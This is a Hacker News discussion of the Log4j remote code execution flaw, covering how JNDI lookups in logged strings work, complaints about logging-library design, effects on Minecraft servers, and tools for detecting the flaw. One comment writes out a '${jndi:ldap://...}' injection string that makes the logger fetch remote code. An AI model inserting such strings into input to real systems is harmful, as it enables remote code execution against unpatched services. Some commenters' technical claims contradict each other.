top | item 29504755

Log4j RCE Found

1385 points| usmannk | 4 years ago |lunasec.io | reply

503 comments

order
[+] lewisjoe|4 years ago|reply
To folks wondering what the issue is about, I'll give a short summary that I myself needed.

Typically a logging library has one job to do: swallow the string as if it's some black box and spit it elsewhere as per provided configurations. Log4j though, doesn't treat strings as black boxes. It inspects its contents and checks if it contains any "variables" that need to be resolved before spitting out.

Now there's a bunch of ways to interpolate "variables" into log content. For example something like "Logging from ${java:vm}" will print "Logging from Oracle JVM". I'm not sure but you get the idea.

One way to resolve a variable using a custom Java resolver is by looking it up through a remote class hosted in some LDAP server, say "${jndi:ldap://someremoteclass}" (I'm still not quite sure why LDAP comes into the picture). Turns out, by including "." in some part of the URL to this remote class, Log4j lets off its guard & simply looks up to that server and dynamically loads the class file.

The fix has introduced ways to configure an allowed set of hosts/protocols/etc and forces Log4j to go through this configuration such that these dynamic resolutions don't land on an random/evil server.

[+] brabel|4 years ago|reply
These "special" strings that Log4j parse must be in the formatting string though, right?

External Strings should normally be logged as parameters, not included in the format String. For example:

    // this is ok
    log.debug("user-agent={}", userAgent);

    // this is bad
    log.debug("user-agent=" + userAgent);
Does this vulnerability still work on the first case?

EDIT: the answer is yes, just tried it myself.

[+] jameshart|4 years ago|reply
Even the variable interpolation is a security risk.

If I have the ability to trigger execution of a process on some service, and one of the things it does is return me the logs form that process, it might be somewhat surprising to the host of that process that if I can pass in "${java:vm}" as input, the logs might leak information about what version of the JVM it's running...

What else might you be able to get a system to leak to you if you can control input and read log output?

[+] spullara|4 years ago|reply
This is just stupid. Logging should not do any side effects except writing to the log.
[+] twic|4 years ago|reply
> Turns out, by including "." in some part of the URL to this remote class, Log4j lets off its guard & simply looks up to that server and dynamically loads the class file.

No it doesn't. That was disabled by default in 2009, and was disabled by default in every release of Java 8 or later: https://github.com/openjdk/jdk8u/commit/006e84fc77a582552e71...

Unless i am mistaken, i don't believe the attack as described by LunaSec actually works against a default-configured JVM released any time in the last decade.

[+] grrrrrrreat|4 years ago|reply
Does this affect SL4j wrappers over log4j as well ?
[+] creatonez|4 years ago|reply
This exploit is quite severe on Minecraft Java Edition. Anyone can send a chat message which exploits everyone on the server and the server itself, because every chat message is logged. It's been quite a rollercoaster over the past few hours, working out the details of how to protect members of servers, and informing players (many of whom uses modded clients that don't receive the automatic Mojang patches) of how to protect themselves. Some of the major servers like 2b2t and Mineplex have shut down, and larger servers that haven't shut down yet are pure chaos right now.
[+] mschuster91|4 years ago|reply
> Anyone can send a chat message which exploits everyone on the server and the server itself, because every chat message is logged. ... Some of the major servers like 2b2t and Mineplex have shut down, and larger servers that haven't shut down yet are pure chaos right now.

Why does this behavior remind me of the old "dcc send start keylogger 0 0 0" exploit of IRC some fifteen years ago?

[+] bullen|4 years ago|reply
So is this fixed in 1.18?
[+] kelnos|4 years ago|reply
On one hand I want to be more forgiving of this, because log4j is very old, and likely this feature was introduced well before we all had a collective understanding of how fiddly and difficult security can be, and how attackers will go to extreme effort to compromise our services.

But at the same time... c'mon. A logging framework's job is to ship strings to stdout or files or something. String interpolation should not be this complicated, flexible, whatever you want to call it. The idea that a logging framework (!) could even have an RCE makes me want to scream... the feature set that leads us to that even being possible just weeps "overengineered".

[+] michaelt|4 years ago|reply
> A logging framework's job is to ship strings to stdout or files or something.

I've seen people (including here on HN) dismiss libraries as "abandoned" when they went a year without a release.

The software industry will never get bug-free, feature-complete software so long as we're selecting for the opposite.

[+] JanecekPetr|4 years ago|reply
No, this is about log4j2 which is kinda new (2.0.0 was released 2014). Otherwise, yeah, this is terrible, especially since the tag doesn't even have to be in the formatting string.
[+] ta4873588478|4 years ago|reply
Yeah this is disappointing to hear about and isn't a good look for the people involved. At the very least it should've been a separate module or an opt-in configuration parameter, who the hell needs a JNDI lookup in a log statement. If you do, do it yourself then log it. Disappointing.
[+] wbl|4 years ago|reply
The Ware report is 60 years old. String formatting bugs are about 20 or 30.
[+] jrockway|4 years ago|reply
So a lot of people sound mad that the logging library is parsing the inputs, and maybe they should be, but the truly paranoid should also be aware that your terminal also parses every byte given to it (to find in-band signalling for colors, window titles, where the cursor should be, etc.). This means that if a malicious user can control log lines, they can also hide stuff if you're looking at the logs in a terminal. Something to be aware of!
[+] hawk_|4 years ago|reply
While that's an interesting vector for attack, is it realistically an issue? Terminals are run as root all the time. I would guess any mainstream ones are well reviewed to not have such exploits work. Are you aware of any actual attacks exploiting terminal parsing in the wild?
[+] dystroy|4 years ago|reply
But you log strings, not bytes, meaning that the escape sequences are escaped, unless there's a severe bug in the logger.
[+] 400thecat|4 years ago|reply
can you show an example how that would work ?
[+] testplzignore|4 years ago|reply
I don't get what the point of this feature even is. What is a legitimate reason for a logging library to make network requests based on the contents of what is being logged? And is this enabled out-of-the-box with log4j2?
[+] BeefWellington|4 years ago|reply
> I don't get what the point of this feature even is.

This is basically the response to every type of vulnerability that is based on some spec nobody's read. Same deal with XML entity parsing. Why should it make web requests, FTP requests, etc.?

At some point someone had it as a requirement and everyone else gets to live with it.

[+] BinaryRage|4 years ago|reply
log4j2 supports lookups, which allows you to add additional logging context:

https://logging.apache.org/log4j/2.x/manual/lookups.html

The problem here is the JNDI lookup because for historical reasons there is code in these providers which causes Java to deserialize and load bytecode if it's found in a result for a lookup against an LDAP server. That exploit was partially fixed in the JDK in 2008, then in 2018, but there are multiple naming providers that are affected.

Yes, it's enabled by default before 2.15.0, released today to mitigate this issue.

[+] nijave|4 years ago|reply
I'm guessing some sort of auditing or routing functionality. For instance, you have debug logs going to some development server and login events going to so audit server.

I don't have experience with this feature but there's similar use cases in log shipping utilities like fluentd

Edit: I read the other link and it looks like some sort of poorly designed RPC functionality or something shrug

Edit 2: Reading https://docs.oracle.com/javase/7/docs/technotes/guides/jndi/..., it sounds like it's a form of service discover of sorts. You talk to a registry server and it provides some object pointing to the real destination

[+] est|4 years ago|reply
> What is a legitimate reason for a logging library to make network requests based on the contents of what is being logged

I encountered a similar problem recently, my own logger can get the current container/pod IP address, it's painful to tell which host from the IPs in logs, so I had to do a manual DNS lookup to include a hostname instead. I was hoping the logger could automatically do a lookup and cache it for me.

[+] jimrandomh|4 years ago|reply
I try to follow a rule with libraries: if a library causes more trouble than the implementation effort it would take to recreate its functionality from scratch (or rather, the portion of its funcitonality that is used in practice), then it's time to purge that library from projects and never use it again.

The part of log4j functionality that gets used in practice, most of the time, is just a wrapper around printf which adds a timestamp and a log-level. This is very quick and easy to write. A library in this role should have zero RCEs, ever in its entire lifetime, or it is unfit for purpose.

[+] nostoc|4 years ago|reply
> just a wrapper around printf which adds a timestamp and a log-level

That's a pretty naive view of what's needed in an enterprise logging solution.

logging to files, separate logging, remote logging, log rotation, logging 3rd party code...

Of course if you're simply sending lines to the terminal in a simple program you don't need log4j.

But once you scale, you'd be spending 3 weeks implementing what you get for free in log4j.

[+] shepherdjerred|4 years ago|reply
I disagree strongly with this.

You're better off learning the de-facto libraries of your language. Your employer, or any production application you're going to work on is probably going to use one of these libraries.

I learned the most common Java libraries when writing personal projects -- Lombok, log4j, Guava, Gson, Jackson, Netty, etc.

I had a significantly gentler learning curve at my first job. We used these common libraries, so I had a very easy time when I had to edit log filtering or fix log rotations of our applications.

[+] mjr00|4 years ago|reply
> The part of log4j functionality that gets used in practice, most of the time, is just a wrapper around printf which adds a timestamp and a log-level.

I... don't think this is true? When I was using it we used log rotation, log truncation, configurable output formatting that could be made consistent across the code or specialized in certain parts of the code base that required more detailed logging, masking credit card numbers and emails in log statements, and doing all of the logging async to not impact performance. And I'm sure there are features it has which I didn't mention.

[+] eyelidlessness|4 years ago|reply
I haven’t used log4j (or a JVM language) for several years but IIRC the most common usage was printf + agnostic but reliable output, commonly adapted to multiple SaaS solutions and usable in dev, and outputting formats that are searchable eg in Logstash. This is roughly the same as I’ve encountered on Node where I’ve also had to remind myself that it isn’t a simple printf -> stdout, even if it looks and feels like it is.

The complexity in logging libraries like this are much greater than they seem like they should be, specifically because they’re designed to abstract a lot of integration use cases in a way that feels like it just works. Marshaling data between even a few services introduces a lot of potential for mistakes.

[+] physicles|4 years ago|reply
For containers that's especially true because the best practice is just to write to stdout/stderr. This sidesteps a whole host of issues related to dealing with log files.
[+] didibus|4 years ago|reply
I think there's a tradeoff. Your implementation is also likely to have vulnerabilities you haven't caught, but it would be more obscure and maybe people wouldn't bother as much finding exploits for it. On the other hand, using a popular commonly used library, it will get tested for vulnerabilities a lot more thoroughly, reported and eventually patched, so it is possibly more hardened.
[+] BatteryMountain|4 years ago|reply
Same mindset here.

I've always written my own loggers, doesn't even take more than an hour in C#-land. log4net is quite a beast so I avoid it. Serilog is pretty cool though, but in most cases I just roll my own. Other than that, .net core comes with its own loggers and logging abstractions, so half the time you don't have to write your own anymore, and if you do, its super pluggable.

[+] adamc|4 years ago|reply
Just a note of appreciation for this thread. One of the things we can get out of debacles like this is a reassessment of how we should design software, and what we should look for in software designed by others. Food for thought.
[+] jsiepkes|4 years ago|reply
Logback has an interesting commit[1]: "disassociate logback from log4j 2.x as much as possible".

They also updated their landing page [2]: "Logback is intended as a successor to the popular log4j project, picking up where log4j 1.x leaves off. Fortunately, logback is unrelated to log4j 2.x and does not share its vulnerabilities."

Can't say I blame them.

[1] https://github.com/qos-ch/logback/commit/b810c115e363081afc7...

[2] http://logback.qos.ch/

EDIT: Removed Apache from Apache Logback since, as correctly pointed out, it's not a Apache project.

[+] spuz|4 years ago|reply
Thanks for the write-up but I have a few questions. Why does log4j's .log() method attempt to parse the strings sent to it? It is the last thing I would expect it to do. Is the part in the sample code where the user's input is output back to them part of the exploit? If so how does it fit into the attack? What will the attacker see beyond the string they originally sent as input?

Could you update your mitigation steps to explain how to set the "log4g.formatMsgNoLookups" config? It's not clear whether this is a property that goes into the log4j config or into the JVM args.

[+] ievans|4 years ago|reply
If you'd like to detect whether you're affected by this dynamically, it looks like https://github.com/google/tsunami-security-scanner-plugins/i... will eventually make it into Google's dynamic scanner: https://github.com/google/tsunami-security-scanner (I bet it would be easy to write a plugin for https://github.com/projectdiscovery/nuclei as well.)

To see if there are injection points statically, I work on a tool (https://github.com/returntocorp/semgrep) that someone else already wrote a check with: https://twitter.com/lapt0r/status/1469096944047779845 or look for the mitigation with `semgrep -e '$LOGGER.formatMsgNoLookups(true)' --lang java`. For the mitigation, the string should be unique enough that just ripgrep works well too.

[+] lgrapenthin|4 years ago|reply
Its just incredible how bloated Log4J is. You'd think a logging library would be rather lightweight, straightforward to configure, no?

No, it is one of those efforts that suffer from their underlying problem being so well understood that, apparently, everybody working on it feels compelled to "enrich" it with more options, config layers, adapters, extensions.

[+] Pxtl|4 years ago|reply
I give up.

It's got as many eyeballs in it as you could ever hope, and it's as mature as any piece of software ever could be.

And its job is to write text to files. It's basically a wrapper around printf.

How did this get screwed up?

Security is impossible.

[+] rank0|4 years ago|reply
I’m amazed at the reaction here. Lots of comments ITT about how this library is horrible and logging should be a solved problem from a security perspective. Similar commentary was here recently regarding some unsafe docker default.

Developers always want abstractions to make programming easier, but they never consider the cost of using those abstractions. It’s so convenient to place all the burden on library authors but you’re the one logging client supplied input in the first place!

Put a regex whitelist on your inputs wherever there’s a trust boundary. How come devs should never have to consider security but FOSS package maintainers do?

[+] wielebny|4 years ago|reply
This is exploitable in applications that use Elastic Stack with logstash as a log processor. I've just been able to reproduce it in an Magento ecommerce with payload inserted into payments details.
[+] robertelder|4 years ago|reply
I've been thinking about this since I saw it here on HN yesterday, and I can't help but entertain the idea that this might end up being 'the worst software security flaw ever'.